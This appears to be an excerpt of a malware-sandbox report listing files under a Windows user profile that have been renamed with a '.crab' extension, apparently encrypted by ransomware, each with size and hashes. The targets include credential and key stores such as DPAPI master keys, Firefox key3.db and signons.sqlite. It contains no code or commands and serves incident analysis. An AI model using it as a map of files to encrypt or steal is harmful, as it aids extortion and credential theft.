c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\addressbook.acrodata.crab	5.79 KB	MD5: be493ec06b6514760750a1dc7136c158 SHA1: 5742fac9d40c4137ec606d17fcb592fe5e1c58ac SHA256: 6c2a7ae20ead630b64115de740a3f8ab6380ec8364488be4ea2e6152b06715b0	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\48b76449f3d5fefa1133aa805e420f0fca643651.crl.crab	1.43 KB	MD5: f9822443400cdfbb5c0f5eccca562016 SHA1: 0393b07ac7f89f3498f8486e7405e5d2619b2cbd SHA256: b6edb6c6d4e74900d4cbebbb92f779bbc0052ee6f42c0226353a7002b041d73c	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\a9b8213768adc68af64fcc6409e8be414726687f.crl.crab	37.34 KB	MD5: 07304fe328136b9775c5a9ffcce0c33d SHA1: bcb1e1c9c65e3573c39369f53d699d6c16df0768 SHA256: caf42351ed035c73b88a234362df42f6d1a5b7197bba136a13afbbd52670b3cc	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ar_dzvvyvqxbfc.png.crab	21.05 KB	MD5: 8c693fb6a9300fe7bc7534eec1f2e49f SHA1: f1db85cd47ed74749f3ae03beca5d67c652c1c22 SHA256: 46321b445f789447f0d6e786a50728e3e7d323cbf92322eb9f7c35cc8b5808bc	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ccaynenl7p.avi.crab	79.20 KB	MD5: 3af29c020b8edc59ed2b59dfa99c9e47 SHA1: 37a8579ebdc96720634072a7d1febd7a4580f1a2 SHA256: f0515aa6121cdbf0c34ef561cbface9e39e31221ec1d527af47cfa3e65164ce1	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ci74df8bzh.gif.crab	2.43 KB	MD5: dde2703dca5890ec405a6e3b2bb121ec SHA1: 23128dbbb5099439d0af62fcc36c2ea4730f906e SHA256: 488b7f301248786133f6223e00938021bdf6a067a9df48e4a50d6ed1e582d7eb	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\dni50i2_-.odp.crab	87.93 KB	MD5: 7831eef0d33a85c1422849ebf54a76fa SHA1: 8a61b1c230b2c552e975f79d46c00082bb1e7871 SHA256: 5a362869b5a5cf1efb065e6b0bdbd81df8f236f58f4b718b0ccd034c915d6920	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\docm.pptx.crab	2.12 KB	MD5: 22ac89218da8d2f2197262138ef05122 SHA1: 45a384855ed3b198031370f501d5ec0cd7078e38 SHA256: ac1670bafd1d184326abaed292e0cf3b042a906d31fff95ef6296e3dcef39d10	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\dxrqjhb s_ge7hcam.flv.crab	89.48 KB	MD5: d7191b0ad4baeadd4e780851ab886a03 SHA1: a253dfe5427e30377cbf3aad4f145f5c640be50d SHA256: 12967ab45ea9d668fab88f23fed7632b20c13899b2a4ec0c0515489795c4bee8	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ekfqn-s.mp3.crab	68.38 KB	MD5: c3d5e3eb4ba410cf3ac246666996b575 SHA1: 41bf52d5ef5abf8751783ff52169ef2738765a34 SHA256: 3a4638f00ed5f3f939eefc63c82835b6ee13f01efa46ca8d7eb13566f081e156	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hr9jmg2bcuzayr3e4p.mkv.crab	87.38 KB	MD5: 9ce85cb5242aa57e8b5bbf48f64c626b SHA1: 7b861bacf3152a875b8f689c8664c4ea0b667fff SHA256: 51e26b67cd7b272feadb005ee640a077a9e0f6b80804a6d756edda6db4246454	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ma1411.gif.crab	64.40 KB	MD5: c675d9769b901569fd3ebce3ac9e1d7c SHA1: f20bfa2339e5d6f80e1cc7ed775da0520413df39 SHA256: d4f0f953aee4260681673af17e158e965ea176b1c67559e7ed1b8a5016178ab2	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab	0.98 KB	MD5: 650ac2f46f9f8e5fa23909367d5c5728 SHA1: 8002fa9f39791e6c30d93531d69b891378b00be0 SHA256: d02630152acbf54403924d21fcd3e7458b10bf2707311cd70c143c3a2697fdb9	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab	0.55 KB	MD5: cb4d53dd1209c60d6d139fce29208dc1 SHA1: 1343fbdc89212689d52fa812a4ec12d251b99a53 SHA256: c921cefe436a7f0f05670da3af6cc86731363f4a3e05bfc56e73267bd1791122	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab	0.60 KB	MD5: 5502ec6e87b2de45d62f6332be8199f6 SHA1: f7fb51627cfec3dd0708b080b8f6742bf58448ed SHA256: b99762bbf47e3fbe830f8d8218160b2c4dbb6b743f008b0521b843c66a787c57	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab	0.57 KB	MD5: c03b453dcacf07e2deb0a200c56cf82c SHA1: 5eac5e245be39c0c3ec37c71d3c5fd665e1b2cc6 SHA256: de709ab4ee971c4ac96ea8db93f9002d9fb0b9708e951850c97c6d69f46fdb26	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\14\built-in building blocks.dotx.crab	3.99 MB	MD5: 757ef6e5460510a3402557c293766bf4 SHA1: adb71cc112bb291e1e95f61bf50dcb64b80a65fd SHA256: 3edeacb41f9d2bcd57bf2126e551823794dc0af6123e368f7a404d5efcf0f341	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\index.dat.crab	32.51 KB	MD5: 84ff3339427ea77dbdd6cfb60c7e7e89 SHA1: 17431d9bd3c0cbc85c0c588b2adc5368d909acbc SHA256: e05f6bf6a096fc968b0cd0b9887b020eb47987ecc213e1aa12dc7809f526304f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\1033\global.mpt.crab	382.01 KB	MD5: e5d5eb6d72010ef71e1a0a6b19c32597 SHA1: 2db64af5af12cfcc4cbe99a561cc37968d1eecc5 SHA256: f011f54c58783ea0af263e5ef6cd23f4c6f2f79239077a2bfebd903441e9ba1e	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\mso1033.acl.crab	37.40 KB	MD5: d9157998fb567453613b63aa2836ebce SHA1: 91904e8a83202160d4dca2fbd86bdd997727092b SHA256: 8d77acee6009fe4c1f5b3eb7e0e05ecbb46dd115f03c54706a9455ec4e053777	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\global.lnk.crab	1.91 KB	MD5: 773f8d031eb25e013dfed25a1c7023e8 SHA1: 9bd8d866ebe2c6bdac7dbfc7380fb2fa3520c728 SHA256: 01e7153bfb2c3053d87ced6be312e32381c879fc04603ea576e7123ed3241705	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\index.dat.crab	0.57 KB	MD5: 0af895332487bc661d45d02be010f66d SHA1: 94893d84c12c3bdf4a483f8261a73866ce0c9b58 SHA256: d3724c6755534db045ff24ac02f51df46ea76b445ce0a3e22ae53f03b6d64b6c	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\templates.lnk.crab	1.63 KB	MD5: 61c7b805143fb0704d3a555185231a79 SHA1: d0977c47bb87b6e46d1f614ec3759d249eb98967 SHA256: fac5e6028110067c5b7f9efeb0b04120295d57f794b051edc3eaf32dee1896bc	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\outlook.srs.crab	3.01 KB	MD5: 8fa95331caa31496f3c873d08b068cb0 SHA1: 4bb71848dd958707b2f14016729ba793f72af48b SHA256: 59aac2745536e4cfa6595f453318ad26e83f76a5b91743ccb61d6bf3f1613ba8	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\outlook.xml.crab	2.93 KB	MD5: 5c56ff4d05aaa5ae2f9dbe2609b0da2d SHA1: f92135058de7af08dbfaf4126d435606397e454b SHA256: 2cd95d76c8ebd8696127c90540d365d2a507221999e40b92970b6cf4cf375f1f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\credhist.crab	0.68 KB	MD5: 98de7b57ffef53421f5a35b8af147e38 SHA1: fda3aad6f391c20e5089daf6352352aa2e37850e SHA256: fbcb832a4c686f4c6c5895961b01b41a5340efbf10d695597a85df014aeb98d4	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.crab	0.98 KB	MD5: 42a5cacc1a1c4fa5736b8832214d3638 SHA1: 2d9ec4190cb5176ea639c01ea03353508e28f2ce SHA256: 107a8b9fdf132a07e5843dcfd19cbc1bd6a27b96d5ceed92b3b599533f37d883	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\preferred.crab	0.54 KB	MD5: 625d17c04b9b8b3483e2dd58f64460c5 SHA1: 267fafff4b76b032c500c5a24954be73dc614e6c SHA256: c1b4535ff187825d0672335fc6c9047501c1422cb894ab7ab6172eae294a63d2	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\02540a10-7eb7-4b20-a8c7-470f8986389c.crab	0.98 KB	MD5: fd3d900cf949ba93403fc8ec1f32abc1 SHA1: 70b8774280739583bdf06d8c5b9fe977a2f84d53 SHA256: 5cf3bf17dd009734c497a038378f1b59050cf37b625f63ef206925aaa40b02b5	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\2be989a0-16a1-424b-9211-51aa3bb43e5d.crab	0.98 KB	MD5: 1abac21ce7a323f4ac28205869aa0d8e SHA1: 3068801909a5cb48f047200730e1e1b51fb55814 SHA256: 0683190d5f7671fe2ee45b704adf504d4ad807e73bc64473d7912c9cd75dc49f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\fbbe72db-afd8-443b-88dd-64b20388700d.crab	0.98 KB	MD5: 84d089054a79e1fdbb2453a6c74392aa SHA1: e67a8907ee4409db9f7ee7f5998ff4eb1f72b938 SHA256: 4d3d9d2a7dcf8f79aec0041d3c1558c3d2217c1f5a91998932d5d518223adc64	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\preferred.crab	0.54 KB	MD5: ffc41b633747e1bb6c35f27eb520c50d SHA1: 80d1f6b72458894782e9f0d7b32bc8ff1cdb2fc5 SHA256: 5f390352d338d0cb2b3dd77ba3134832058473f56acfe2c2bd3169142eff4517	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\synchist.crab	0.59 KB	MD5: 2666100bd86d857ec3c069dc08a2c7fa SHA1: 8d3c334e39e55a8d22f16d09406d7ffb0c5f9b47 SHA256: ceebe162fd487700d0d203d288681ce6f5f8f7544b67e6bbb1ed1b6fa7d5e4a6	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab	0.68 KB	MD5: ba3cd93cf8db2debd9331f825d9541be SHA1: 63e34c1b5bd3b7b364ba93170e07c6600d225ad1 SHA256: c4d5d8f982a3a2a032afbb621b9b77b3da7683f8581edeab6a51e7c8db7abdbe	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\templates\normal.dotm.crab	20.66 KB	MD5: 90486f059d1d40e406127b92de598212 SHA1: 7bb6172980ccc8ada40943b42c6b55f2fda63ef3 SHA256: 703ae80b1f642b46316f0fae83205e2badd45bfb47ce56e06f4cb5617838612c	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332.crab	0.52 KB	MD5: d128c72f9f35e3ac68663111fbd80ab2 SHA1: cfa14a167bf080695ac9a6a8948a28379a814cf5 SHA256: b46e3c0d14453b19b32777166a9b6ed3f4679c7ed5c77b21b92cfe4218123902	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\addons.json.crab	0.54 KB	MD5: 86c867015db888331fc4c5465e57266a SHA1: 9c809691331994961bab075e764b452e5576bacb SHA256: 2b96cdf9efe85db92ee2812c737acdaf8f0c60b9c5edbb495567dc8e39a70eff	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-05_5.json.crab	3.48 KB	MD5: 81fe8e23e9deffdcb6e92549185a973a SHA1: dfadc3d325425124a45e50c02b38e82c7f42d1eb SHA256: 8ad5c27ec84d8a0c0c3fe830537090280dd8688c2e23abc00b7a60caab076ff3	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-16_5.json.crab	3.48 KB	MD5: 90b47270cb555cbbc296cea6c9addfd6 SHA1: c17b3f9c72af56dee7653b09733bdd710e19ffbe SHA256: 062c0bdb70fb55f756b3c21708ebcb73a05e701e1f222ce57237fae30497c1ed	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\cert8.db.crab	64.51 KB	MD5: 14a078be26512cf24ee5f14280622993 SHA1: 270ac01ae65bfa4c1ee3f47e7ea3a0e0e0619026 SHA256: 2223250f8465794eab842467bd80d1078467e279864af9bb158252458c38d0fc	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\compatibility.ini.crab	0.71 KB	MD5: ea46b565ddf6d04af498e805338e215f SHA1: e248f25c75ce6ba1818534468d41de244c9cd8a6 SHA256: 82090906efe3393c8e8a1e6ef82fede3198b5dfeaebbccccdcb6489af25fc69c	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\content-prefs.sqlite.crab	224.51 KB	MD5: cc8e89c2377272d0639a6d3dbbaa889f SHA1: 051d70886733b8af0269f43c312f98df1f495354 SHA256: a194600707a649166bc2e08ce375563b35d4ac1b059d904407dc50ff0071d7c7	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\cookies.sqlite.crab	512.51 KB	MD5: c4d76e6549d3c1a25e8174c614b149e5 SHA1: 7ecc761f3320c15f2826a551c4b617fbc58e93f8 SHA256: 0b1386334ef9e17e7721f89fb1574586c0eae03f91c1591529e2cc96c95b271b	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\downloads.sqlite.crab	96.51 KB	MD5: 027d9ce3eeaeb420e886b35721eb1252 SHA1: 293dff56da488e605c844566e2caad54d598d8aa SHA256: 29d29e8ab9574613e5b902d54a29316acbf16cc43e5bf4f4db3c7766cc98ff3c	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\extensions.ini.crab	0.65 KB	MD5: bd2acb1e29ea5cda2028ba4e08b1dbf8 SHA1: 7da8809d469e355fc37522926d5c623c676cf2e4 SHA256: 710dc776b0804b145a701d6b109970642321d31a19b30901aa85e16c97b4e44f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\extensions.sqlite.crab	448.51 KB	MD5: f1ac8ad5acc5a32194703d5b0507a967 SHA1: 94d809693038e66284e3abfddae14fb142f41e35 SHA256: 2e1ac5423a8514bb150fb9a6d7ca181f70e48a79f1ff2f77842273bc3bd7964a	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab	640.51 KB	MD5: 45283cab32710abb6de1b0c4012d4075 SHA1: f8daf36db6630200c04d2872657e540813b2f551 SHA256: 7d9195d46cccbbf7a9927d3cfb5c6d20fdfaa9e1c27521c8233aec6ce3e83caa	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\key3.db.crab	16.51 KB	MD5: 2f63ae883a30aaf44cc42f1aeaa79681 SHA1: 3f4758c6006bf3a9786a3892a318aef093437557 SHA256: 4d8ed2b4b0f2092bcabb0befd05dbedd4b40aef72be66b31e5830fd344a48d6d	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\localstore.rdf.crab	1.77 KB	MD5: 4767c231f2804478e39d70e74431a001 SHA1: 1fbcaa2d829f22fe27d40cad923644303d6ef3b0 SHA256: 869d936046365e455005af77fa352fe085cb6cb48019b6ee84d918e8fa087a02	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\marionette.log.crab	0.57 KB	MD5: 08aa1aaff2e91a13c128826fd7e3d0e4 SHA1: f9779e4d8916a41fa4a213f6c8c165297aaa3b85 SHA256: c0dcc7c60d6fedada954501c5083957614cdf43ca8ead8a9b9d8256f12abfb82	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\mimetypes.rdf.crab	4.26 KB	MD5: 8189c8d304f9b5fc427f9e94aa02880e SHA1: 9e95ea8ecea67697e131b0a3c78ac8d09f33b1f3 SHA256: 0fdf6530ffc5f1d9f1ceea1c4edf684a843332591a138f5490ae203bd10f12d5	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\permissions.sqlite.crab	64.51 KB	MD5: ea5ea997bb452f162101a8f9941e522e SHA1: 584cecee44b4d8baab2e22a379e7ccbee18d871e SHA256: 0f6b508bade93ccbfc10fe887761a4812fa5dd63ca76f0d73fb3939e79aed6d5	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\places.sqlite.crab	10.00 MB	MD5: a899575685473bb51141348668caacc2 SHA1: 52a3f585a5e2e2917da097ce728a856ab4df8f58 SHA256: 85fe3831e48d933d62f1ae85b0a694881bea6a7dad3d89343ef3d9885c55cad0	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\pluginreg.dat.crab	4.04 KB	MD5: d4b1c76db04411ac507ef727ccdb9d5f SHA1: 11c733148227d6c72d9bff9be4a1008e80eeff00 SHA256: 43b94e21cbb24b4f03cceaf6a21be6ebe95f34fb3fd16dd0db70726be25de7f4	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\prefs.js.crab	4.48 KB	MD5: 602e47773b1f358d9927c37204a411f9 SHA1: 69df241d8f9586d855cd86f5abb16397fdd943c2 SHA256: dfc3b6883597218813a9b726384bdb551624d0deeb608f8e75c8c6592b534e36	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\search.json.crab	16.90 KB	MD5: c2a03993ad132d0e2c10aa607319e718 SHA1: 342db1c301b32b01e56d327540e50c27b5a0ac2c SHA256: 71394f666072c7c2048352aa6cacd92ffea171cc96f12f7f676abd5765e1b992	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\secmod.db.crab	16.51 KB	MD5: 15e4c2d06aec9f288a80352a210ad020 SHA1: 717400355526d8bdd00d0f12ed652ba134655745 SHA256: cb111816dc34e890c41c5428df7371a1e055f10b95842a85519c8c9af52af6ea	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\sessionstore.bak.crab	1.48 KB	MD5: 6e79eb389401618a27b6292be8c143ee SHA1: cf2ce85de2b5372af96f794af1101e967baa9827 SHA256: f76dea692f738eca184bd31382da994e22a656f8f6bc54067cad71eb1c25f3cb	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\sessionstore.js.crab	3.46 KB	MD5: edfec2d948ad6a4e90a55383554e4046 SHA1: d413871bdc296563f6d212b442a6229807041049 SHA256: 671ffac7a10c806bd4585468757dddd7d2a7843a631715bb67c62b597f631306	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\signons.sqlite.crab	320.51 KB	MD5: 660e1c90377e0e7a11b35e96d4e27ad1 SHA1: 427fb782f870b2a64fd778d8f4ee0973d0ec7400 SHA256: 5d13aa2e08afe40fdb164d9241fe573643cf0d0a59bcf9319af8748f003db5cf	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\times.json.crab	0.54 KB	MD5: 9d82b8c21558455a901c4cad857377f2 SHA1: c48ad5cf1b56d6fe1b3a5313ee5ad54a1259f3d7 SHA256: b069d0fdc15d2ddac7f836b357992f14518a29d725e012cc9b425e0a9e33abea	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\webappsstore.sqlite.crab	96.51 KB	MD5: 43dd8ded1a9c58d5e8b8cce30db8f084 SHA1: 6e16ae5b7cd3b30efa8075201d69d6a17752bbe5 SHA256: 3279330dec57bda33b9a491023ff9c25275dc3a15f99380d0354d9cde2be8197	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles.ini.crab	0.62 KB	MD5: 82da87e39c32d14155f112bc11bb68e4 SHA1: c0b2d174bc75e802808866727367f24c02ed8a7d SHA256: c70a91c0d93c066b498063ea55b0cf0a0d879117371d1857b82420524485ba3f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\n3rdqv5ffox1ry_t.mp4.crab	96.34 KB	MD5: 9d5e235cd5d1d6b1134c705c03dbd33c SHA1: 58dda6958c3c8d47923fc41ff85cc3526622524d SHA256: cf29988d0ec0c107f4efdee5dc2f8959eba65fc82968214dad62eefcb39424ff	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\n6uk91wl.jpg.crab	62.77 KB	MD5: 31b82047c7e0b879f65690b4604a375f SHA1: bca61c4204fe707a8b3f70179766ca89a1693dc9 SHA256: f279eeb2b667827ac93fb9935ba6337b5c53ec8973bfc2ee46e496b3c108c946	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\o5sr.mp3.crab	32.98 KB	MD5: 2aa34d387ce002fbafec74cb0b0504cf SHA1: e8ed3fae8f9ca4139a638400d37e41cd9b5a3a29 SHA256: c6d29ca17a404be81084a91aeb6298dd083cac4f9ceaea25318e05208554f45d	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ocdqc.mp3.crab	4.82 KB	MD5: c99d58f31714b075673673f5ba38c3dd SHA1: c5e0cca6b50a12454c77e8dd680d4d8de5eee986 SHA256: 82f70bd399c561022a0e1a004735d95359ca8b592852b84f2277c70519a59a4f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\oq76.png.crab	6.40 KB	MD5: 553b7299d53d722924e4bdb9abc7f670 SHA1: 1c6828841122aac023e758684da57bd6db6da6cd SHA256: e27ddfa0196545a25752cdc56afaae952ec68da13056518979ebce01370bbc7f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\q7m4 o69ufjzp0qfw.gif.crab	3.46 KB	MD5: 8d193c7e891655d56678d9f9a04634a1 SHA1: dc5f6196b707f5e1a82090eaec045f2a09c6d6f6 SHA256: cb635629ba1e3dbf13fa966297982cc5a69428a5cca00ad22a5b1b01177545ca	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\rnylouveiolgfswwxoi.bmp.crab	15.90 KB	MD5: 72818685cf6c0e5eafbd78ecd06ae62c SHA1: 844de1a256bb63de43ffce7a30da74acfa3031de SHA256: bc7d6e539e14e41d898bd17f097cf8526ffd818dc9fbe490409aae55be33188e	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\saybusyjaxv.png.crab	73.37 KB	MD5: b02657cb77cbc988e1bb1212def08be3 SHA1: 4f9f941b5664729f11d855052d821d2d4bd3af90 SHA256: fccf3a7db57adb636e9aeca246347a36400324c9af6473a850505848e810fbf8	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ttlmm _bzqiif.mkv.crab	63.40 KB	MD5: 7ad14e2684e6b147fd0429a7d7c8e07a SHA1: 950ae0a6123c514b2c0aac11401c9fe86dddede6 SHA256: 00b0a930220b3c014d26e00e21ef3316582e789d1f2ec1be5a6a077289613624	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\tz4atgfhqmeh_xf9.jpg.crab	35.85 KB	MD5: 71b0c3c5431bb34c6dfad728925e3e66 SHA1: 0f2ee55fa201d8a47b435feae4a3a69ecca63c9a SHA256: 77814fc4bec788ca4c9897336a23eade9e8568a824caad328d6116ab1e065a5a	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\vi8uu4e.wav.crab	89.15 KB	MD5: 2aff6c68572905dd5de8c9a6d4c0df62 SHA1: 0f295125d0899ab5968c9a0cea46226451f7c8c8 SHA256: 73740891ecf11a332ba75e10bf4d6d8d8faa9be52160ef1264e596f13d6522d7	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\wegdsqhxrb6rl_.mp3.crab	49.84 KB	MD5: 13c33237416074355f12583dd5719287 SHA1: 5b9844ed821b707640b540855532e7f3bbc9bdf0 SHA256: dd8eb43bf0906afb86a6caa98ca3bc3c93c4124b89e340ba34bb0aa73f7fb184	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\wzizj94sbmpj.pptx.crab	93.80 KB	MD5: 0937bbde796805b26c6cdbc2cfdc52e9 SHA1: f09909013256546a24ced542d147f7ce8a61b8b7 SHA256: 1b0a216f123c10b97be54dc672f873faa3f4122be6fac3648141e1517b20a5ac	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\contacts\aclviho asldjfl.contact.crab	1.66 KB	MD5: 3c62e6568256b62202ff0cb111d52354 SHA1: 400c47ec32ef25d08b58ede17b8c8a53267467eb SHA256: a7f2dd547a3253bcd27211671fe04c4700c4d04db68192dc14cfce67b8d6979f	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\contacts\administrator.contact.crab	67.29 KB	MD5: 07fa6fa9f0f74cdffba8508a118f4527 SHA1: d786403dcf50af88b686df1895a7260d62ed7b04 SHA256: 32840dcefc2c05e6d1ff21bc57fd257d17aac31649e6ac88b2f96dc6ccaa7f93	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\contacts\asdlfk poopvy.contact.crab	1.66 KB	MD5: cfb965df94a39d808ec215e3133576b8 SHA1: de115022690f24d58df9cd417feae98558f96e42 SHA256: 0a1b36d2acb011e362b42a6ed5f4a37436d472cb5c7381c179c2c6bb1c3f0ce4	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\contacts\chucu jadnvk.contact.crab	1.66 KB	MD5: 8f0c3ac48dfd826b0c1d611e2e483429 SHA1: cc88be7ab36b62163e689fe00959f560b20aea45 SHA256: 1a12b4963271e6ff13e60624566bd227aca312af703bccc67bea05f4d7097b38	... File Actions Show Properties Download
